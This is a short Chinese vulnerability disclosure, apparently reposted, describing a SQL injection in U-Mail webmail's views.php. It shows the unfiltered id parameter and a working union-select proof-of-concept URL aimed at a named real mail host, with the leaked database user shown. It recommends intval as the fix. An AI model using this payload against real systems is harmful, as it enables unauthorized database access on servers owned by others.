漏洞 文件:client\option\module\views.php
if ( ACTION == "letterpaper" ) { $lp_id = gss( $_GET['id'] ); if ( $lp_id ) { if ( $lp_id == "add" ) { $lp_info['letterpaper'] = "<div id=\"lp_wrap\" style=\"background-color:#fff;color:#000;font-size:12px;padding:20px 30px;\"><div id=\"lp_wrap_content\"></div></div>"; } else { $lp_info = $Widget->getone_letterpaper( "id=".$lp_id, "*", 0 ); } } else { $lp_list = $Widget->get_letterpaper( array( "fields" => "*", "where" => "UserID=0 or UserID=".$user_id, "orderby" => "UserID", "debug" => 0 ) ); } include( load_tpl( "op_letterpaper" ) ); }
未过滤直接进入查询 $lp_info = $Widget->getone_letterpaper( "id=".$lp_id, "*", 0 );
http://mail.comingchina.com/webmail/client/option/index.php?module=view&action=letterpaper&id=1%20and%201=2%20union%20select%201,2,3,user(),5,6,7,8<div class="hasselect" style="display:none;" id="hasPic"> <span>背景图片:</span> <div class="bgtypecontrol"> <img id="littleimg" src="umail@localhost">
修复方案:
intval
查看更多关于U-Mail邮件服务系统最新版SQL注入漏洞 - 网站安全的详细内容...
声明:本文来自网络,不代表【好得很程序员自学网】立场,转载请注明出处:http://haodehen.cn/did15095